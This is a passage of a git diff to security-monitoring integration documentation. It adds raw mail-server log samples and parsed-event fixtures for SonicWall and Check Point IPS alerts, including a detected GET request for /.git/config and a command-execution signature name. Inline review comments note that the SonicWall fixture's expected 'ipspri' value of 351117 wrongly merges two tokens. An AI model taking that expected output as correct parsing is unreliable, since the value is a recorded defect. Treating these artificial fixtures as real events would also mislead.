From: =?UTF-8?q?Cellier_du_P=C3=A9rigord?=?? from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: FALSE + ``` + + + +=== "wo_appname_postgrey1" + + ``` + action=greylist, reason=early-retry (10s missing), client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey2" + + ``` + action=greylist, reason=new, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey3" + + ``` + action=greylist, reason=new, client_name=unknown, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey4" + + ``` + action=pass, reason=client AWL, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey5" + + ``` + action=pass, reason=client whitelist, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey6" + + ``` + action=pass, reason=triplet found, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com + ``` + + + +=== "wo_appname_postgrey7" + + ``` + whitelisted: mx.example.org[1.2.3.4/32] + ``` + + + +=== "wo_appname_postgrey8" + + ``` + whitelisted: unknown[1.2.3.4/32] + ``` + + + +=== "wo_appname_qmgr" + + ``` + 89BE920002: from=, size=152518, nrcpt=1 (queue active) + ``` + + + +=== "wo_appname_qmgr2" + + ``` + 074955F67C: from=, size=4303, nrcpt=1 (queue active) + ``` + + + +=== "wo_appname_queued" + + ``` + CA9311112C08: to=, relay=srv.corp.com[1.1.1.1]:25, delay=8.4, delays=7.6/0/0.31/0.47, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 4TwNdH5zwCz7fxV) 257 + ``` + + + +=== "wo_appname_relay" + + ``` + 56E28C0007: to=, relay=1.1.1.1[1.1.1.1]:10025, delay=0.63, delays=0.57/0/0.05/0.01, 
dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as DF82A21108) + ``` + + + +=== "wo_appname_replace_header" + + ``` + 95BCC140E40: replace: header From: EXAMPLE <[hola@example.org](mailto:hola@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "wo_appname_replace_header_1" + + ``` + 95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "wo_appname_replace_header_2" + + ``` + 2F46A140256: replace: header 
From: "Example Help" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_smtp2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_smtp3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_smtp4" + + ``` + 05BC43F81E: host mx.example.org[5.6.7.8] said: 421 4.3.0 Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command) + ``` + + + +=== "wo_appname_smtp5" + + ``` + 30D713F81F: host mx.example.org[5.6.7.8] said: 450 4.1.1 : Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. Reason: JFE030050 (in reply to RCPT TO command) + ``` + + + +=== "wo_appname_smtp6" + + ``` + connect to mx.example.org[5.6.7.8]:25: No route to host + ``` + + + +=== "wo_appname_smtp_connection3_timed_out" + + ``` + connect to mail.corp.com[1.1.1.1]:25: Connection timed out 125 + ``` + + + +=== "wo_appname_smtp_relay" + + ``` + 96887C0006: to=, relay=exemple.com[1.1.1.1]:25, delay=354776, delays=354775/0/0.9/0.16, dsn=4.3.1, status=deferred (host exemple.com[1.1.1.1] said: 452 4.3.1 Insufficient system storage (in reply to MAIL FROM command)) + ``` + + + +=== "wo_appname_smtpd1" + + ``` + 021C03F820: filter: RCPT from mx.example.org[192.168.100.124]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_smtpd2" + + ``` + lost connection after BDAT from mx.example.org[192.168.100.124] + ``` + + + +=== "wo_appname_smtpd3" + + ``` + warning: hostname mx.example.org does not resolve to address 5.6.7.8: Name or service not known + ``` + + + +=== 
"wo_appname_smtpd4" + + ``` + warning: mx.example.org[192.168.100.132]: SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org + ``` + + + +=== "wo_appname_smtpd_connection" + + ``` + lost connection after AUTH from unknown[1.1.1.1] + ``` + + + +=== "wo_appname_smtpd_connection2" + + ``` + connect from unknown[10.1.1.1] 88 + ``` + + + +=== "wo_appname_smtpd_tls" + + ``` + Trusted TLS connection established from mail.outbound.protection.outlook.com[1.1.1.1]: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits) + ``` + + + +=== "wo_appname_smtpd_tls2" + + ``` + Trusted TLS connection established to mx.corp.com[1.1.1.1]:25: TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 + ``` + + + +=== "wo_appname_smtpd_tls3" + + ``` + Trusted TLS connection established to 127.0.0.1[127.0.0.1]:10025: TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 201 + ``` + + + +=== "wo_appname_spamd1" + + ``` + spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,SPF_HELO_NONE,SPF_PASS,T_KAM_HTML_FONT_INVALID scantime=3.4,size=120289,user=debian-spamd,uid=119,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=44944,mid=<11111111111111@uexample.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd10" + + ``` + spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FORGED_HOTMAIL_RCVD2,FREEMAIL_FROM,HTML_IMAGE_RATIO_04,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.7,size=102578,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45880,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd11" + + ``` + spamd: result: . 
-1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,FREEMAIL_REPLYTO_END_DIGIT,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_DNSWL_NONE,SPF_HELO_PASS,SPF_PASS,T_FREEMAIL_DOC_PDF scantime=4.7,size=2252595,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=49594,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd12" + + ``` + spamd: result: . -1 - DMARC_PASS,MIME_HEADER_CTYPE_ONLY,MISSING_DATE,MISSING_MID,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=4260,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=46436,mid=(unknown),autolearn=disabled + ``` + + + +=== "wo_appname_spamd13" + + ``` + spamd: result: . -1 - FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=8094,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=39504,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd14" + + ``` + spamd: result: . -1 - FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=61589,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=37172,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd15" + + ``` + spamd: result: . -1 - HTML_FONT_LOW_CONTRAST,HTML_IMAGE_RATIO_08,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_MOSTLY,MPART_ALT_DIFF,RCVD_IN_MSPIKE_H4,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=164381,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=56082,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd16" + + ``` + spamd: result: . 
-1 - HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_OBFUSCATE_05_10,MIME_HTML_ONLY,SPF_HELO_PASS,SPF_PASS scantime=2.5,size=1572,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=51336,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd17" + + ``` + spamd: result: . -6 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=7882,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33278,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd18" + + ``` + spamd: connection from test.com [127.0.0.1]:33620 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd19" + + ``` + spamd: connection from mx.example.org [127.0.0.1]:33620 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd2" + + ``` + spamd: connection from example.org [127.0.0.1]:53684 to port 783, fd 5 + ``` + + + +=== "wo_appname_spamd20" + + ``` + spamd: processing message for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd21" + + ``` + spamd: processing message for debian-spamd:117 + ``` + + + +=== "wo_appname_spamd22" + + ``` + spamd: processing message <0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com> for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd23" + + ``` + spamd: processing message <55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com> for debian-spamd:118 + ``` + + + +=== "wo_appname_spamd24" + + ``` + spamd: processing message <66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM> for debian-spamd:117 + ``` + + + +=== "wo_appname_spamd3" + + ``` + spamd: result: . 
-1 - AC_DIV_BONANZA,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS,URI_NOVOWEL scantime=3.2,size=209868,user=debian-spamd,uid=117,required_score=5.0,rhost=test.host.test,raddr=127.0.0.1,rport=44702,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd4" + + ``` + spamd: result: . -1 - ANY_BOUNCE_MESSAGE,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,OOOBOUNCE_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.7,size=14228,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=36236,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd5" + + ``` + spamd: result: . -1 - APOSTROPHE_FROM,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=4.9,size=575869,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=41352,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd6" + + ``` + spamd: result: . -1 - DEAR_SOMETHING,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HTML_MESSAGE,PDS_BTC_ID,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_NONE scantime=5.3,size=468649,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=42678,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd7" + + ``` + spamd: result: . 
-1 - DEAR_SOMETHING,DMARC_PASS,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=3254,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45060,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd8" + + ``` + spamd: result: . -1 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.3,size=10467,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45920,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + +=== "wo_appname_spamd9" + + ``` + spamd: result: . -1 - DKIM_INVALID,DKIM_SIGNED,HEADER_FROM_DIFFERENT_DOMAINS,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS,T_REMOTE_IMAGE scantime=2.9,size=65264,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33254,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md index 7b4038bdfa..e8d5842094 100644 --- a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md +++ b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887.md 
@@ -30,7 +30,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_app_control_detection_alert.json" 
@@ -500,6 +500,48 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_ips_detection_alert.json" + + ```json + + { + "message": "0|SonicWall|TZ 370|7.1.1-7058-R6162|608|IPS Detection Alert|9|11111:22:33:44:55:666.7.8.9999999ABVOIPCD.7.8.111111111:22:33:44:55:6666.7.8.9999999A0-V10WAN92.168.0.1udp/50601010\"Default Access Rule_145\"35\"IPS Detection Alert: INFO SIP Session Progress, SID: 1188, Priority: Low\" msg=\"IPS Detection Alert: INFO SIP Session Progress\" sid=1188 ipscat=\"INFO SIP Session Progress\" ipspri=3 51117", + "event": { + "category": [ + "network" + ], + "code": "608", + "kind": "alert", + "reason": "IPS Detection Alert: INFO SIP Session Progress", + "severity": 9, + "type": [ + "protocol" + ] + }, + "cef": { + "event_type": "base event" + }, + "observer": { + "type": "firewall", + "vendor": "SonicWall", + "version": "7.1.1-7058-R6162" + }, + "sonicwall": { + "fw": { + "event": { + "name": "IPS Detection Alert" + }, + "ipscat": "INFO SIP Session Progress", + "ipspri": 351117, + "priority": "ALERT", + "sid": 1188 + } + } + } + + ``` + + === "test_syslog_website_accessed.json" ```json 
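Review bot: the expected `"ipspri": 351117` in the `sonicwall.fw` block of `test_ips_detection_alert.json` records a parsing defect rather than the intended result. The raw message ends in `ipspri=3 51117`, where the IPS priority is `3` (matching the `Priority: Low` text earlier on the same line) and `51117` is a separate trailing token; the two have been concatenated across the space. The fixture should assert `"ipspri": 3`, with the trailing token dropped or mapped to its own field, and the `ipscat` value shows the same token boundary is handled correctly for quoted strings, so only the unquoted numeric case needs fixing.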
@@ -690,10 +732,9 @@ The following table lists the fields that are extracted, normalized under the EC |`sonicwall.fw.fw_action` | `keyword` | URL: Applicable only when Network Packet Capture System (NPCS Solera) is enabled, displays URL of an NPCS object | |`sonicwall.fw.gcat` | `number` | Group category: Display event group category number when using Enhanced Syslog | |`sonicwall.fw.gcatname` | `keyword` | Group category: Display event group category name when using Enhanced Syslog | -|`sonicwall.fw.ipscat` | `number` | Displays the IPS category | +|`sonicwall.fw.ipscat` | `keyword` | Displays the IPS category | |`sonicwall.fw.ipspri` | `number` | Displays the IPS priority | |`sonicwall.fw.priority` | `keyword` | Displays the event priority level | -|`sonicwall.fw.reason` | `number` | Blocking code: Indicates the CFS block code | |`sonicwall.fw.sid` | `number` | Provides either IPS or Anti-Spyware signature ID | |`source.bytes` | `long` | Bytes sent from the source to the destination. | |`source.domain` | `keyword` | The domain name of the source. | diff --git a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md index ebd02d1da6..f778072fc7 100644 --- a/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md +++ b/_shared_content/operations_center/integrations/generated/ee0b3023-524c-40f6-baf5-b69c7b679887_sample.md 
@@ -44,6 +44,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_ips_detection_alert" + + ``` + 0|SonicWall|TZ 370|7.1.1-7058-R6162|608|IPS Detection Alert|9|11111:22:33:44:55:666.7.8.9999999ABVOIPCD.7.8.111111111:22:33:44:55:6666.7.8.9999999A0-V10WAN92.168.0.1udp/50601010"Default Access Rule_145"35"IPS Detection Alert: INFO SIP Session Progress, SID: 1188, Priority: Low" msg="IPS Detection Alert: INFO SIP Session Progress" sid=1188 ipscat="INFO SIP Session Progress" ipspri=3 51117 + ``` + + + === "test_syslog_website_accessed" ``` diff --git a/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md b/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md index a89d58521f..edff737c84 100644 --- a/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md +++ b/_shared_content/operations_center/integrations/generated/ee54dd8e-4bd4-4fe8-9d9d-1a018cd8c4bb.md 
@@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "account_modification.json" diff --git a/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md b/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md index 5ee1c7c098..4a9135ef80 100644 --- a/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md +++ b/_shared_content/operations_center/integrations/generated/ee6364a1-9e3c-4363-9cb6-2f574bd4ce51.md 
@@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "CountsofSecurityEvents.json" diff --git a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md index e65128fecd..3cb9e3f6c1 100644 --- a/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md +++ b/_shared_content/operations_center/integrations/generated/f0a10c21-37d1-419f-8671-77903dc8de69.md 
@@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "CEF.json" 
@@ -664,6 +664,83 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "CEF_proxy_src.json" + + ```json + + { + "message": "0|Check Point|SmartDefense|Check Point|IPS|Web Server Exposed Git Repository Information Disclosure|Very-High|act=Detect cp_severity=Very-High cnt=1 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=asm_dynamic_prop_GIT_EXPOSED cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Web Server Exposed Git Repository Information Disclosure cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=5 flexNumber2Label=Performance Impact flexNumber2=3 flexString2Label=Attack Information flexString2=Web Server Exposed Git Repository Information Disclosure in=52 msg=Web Server Enforcement Violation out=0 request=http://9.10.11.12/.git/config requestMethod=GET rt=1722861810000 spt=51451 dpt=80 cs4Label=Threat Prevention Rule ID cs4={115C1043-DF8A-48D4-96CB-0200C1F1499A} cs4={6E7AA7B4-FD2A-40A3-ACDE-AC1182F1120F} cs1Label=Threat Prevention Rule Name cs1=Antibot + TE EAP layer_name=IPS layer_uuid={1DA55D35-9A2B-4141-A512-150DC635378B} layer_uuid={368D4C86-B4FD-4EF9-9AED-E58C4C0DEE7F} smartdefense_profile=EAP_Prevent smartdefense_profile=Profil_EAP_Anti-Bot_TE ifname=bond1.103 loguid={0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20} origin=192.168.203.80 originsicname=CN\\=MyGW,O\\=MyDomain_Server.checkpoint.com.s6t98x sequencenum=85 version=5 description_url=GIT_EXPOSED_help.html dst=1.2.3.4 lastupdatetime=1722861871 log_id=2 policy=2016-12_Prolix_Migration-FW policy_time=1722591913 product=SmartDefense proto=6 proxy_src_ip=5.6.7.8 reject_id_kid=66b0c8f2-2-a5f697e5-ce3758d7 rule_uid=e70129a9-2a18-4075-8042-b85f0b601ca4 ser_agent_kid=Safari 4.0 session_id={0x66b06cef,0x11,0x9b1c4c53,0xdf840ae7} smartdefense_profile=EAP_Prevent src=5.6.7.8 tags=Vendor_Git Product_Web_Servers Threat_Year_2015 Threat_Prevalence_True 
Protection_Type_Vulnerability Product_Prevalence_Common Tuning_Non_Configurable Protocol_HTTP Direction_SERVER", + "event": { + "code": "IPS", + "message": "Web Server Enforcement Violation", + "outcome": "success" + }, + "action": { + "name": "detect", + "outcome": "success", + "outcome_reason": "Web Server Enforcement Violation", + "properties": { + "loguid": "{0x611c9f51,0x8c73c182,0xe99e964e,0x2addea20}", + "observer_type": "SmartDefense", + "origin": "192.168.203.80", + "originsicname": "CN=MyGW,O=MyDomain_Server.checkpoint.com.s6t98x", + "product": "SmartDefense" + }, + "target": "network-traffic" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 80 + }, + "http": { + "request": { + "method": "GET" + } + }, + "log": { + "level": "Very-High" + }, + "network": { + "direction": "outbound", + "forwarded_ip": "5.6.7.8", + "transport": "tcp" + }, + "observer": { + "ingress": { + "interface": { + "name": "bond1.103" + } + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "uuid": "e70129a9-2a18-4075-8042-b85f0b601ca4", + "version": "5" + }, + "source": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 51451 + }, + "url": { + "domain": "9.10.11.12", + "full": "http://9.10.11.12/.git/config", + "original": "http://9.10.11.12/.git/config", + "path": "/.git/config", + "port": 80, + "scheme": "http" + } + } + + ``` + + === "CEF_reject.json" ```json 
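Review bot: this fixture does not exercise the case it is named for. In the raw message `proxy_src_ip=5.6.7.8` and `src=5.6.7.8` carry the same address, so the expected `"network": {"forwarded_ip": "5.6.7.8"}` and `"source": {"ip": "5.6.7.8"}` would pass even if the two keys were swapped or both were fed from `src`. Use a distinct `proxy_src_ip` value so the sample pins which key populates `network.forwarded_ip` and which populates `source.ip`, and add that second address to `related.ip`, which currently lists only `1.2.3.4` and `5.6.7.8`.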
@@ -725,6 +802,73 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "CEF_syslog.json" + + ```json + + { + "message": "0|Check Point|SmartDefense|Check Point|IPS|Syslog Message Length Enforcement|Medium|act=Detect cp_severity=Medium cnt=53 cs1Label=Threat Prevention Rule Name cs2Label=Protection ID cs2=02syslg_max_msg_len_tab cs3Label=Protection Type cs3=IPS cs4Label=Protection Name cs4=Syslog Message Length Enforcement cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} deviceDirection=1 flexNumber1Label=Confidence flexNumber1=1 flexNumber2Label=Performance Impact flexNumber2=2 flexString2Label=Attack Information flexString2=phpFileManager cmd Parameter Command Execution in=0 msg=Syslog Protocol Violation out=0 rt=1705349059000 spt=57789 dpt=514 Signature=CVE-1999-0063, CVE-1999-0381 cs4Label=Threat Prevention Rule ID cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs4={C29BF96E-4967-4BC0-9759-8CD2E668D37E} cs1Label=Threat Prevention Rule Name layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_name=dn Threat Prevention layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} layer_uuid={FB7CC4DE-9326-4CB5-9CDF-33A2996F1F57} 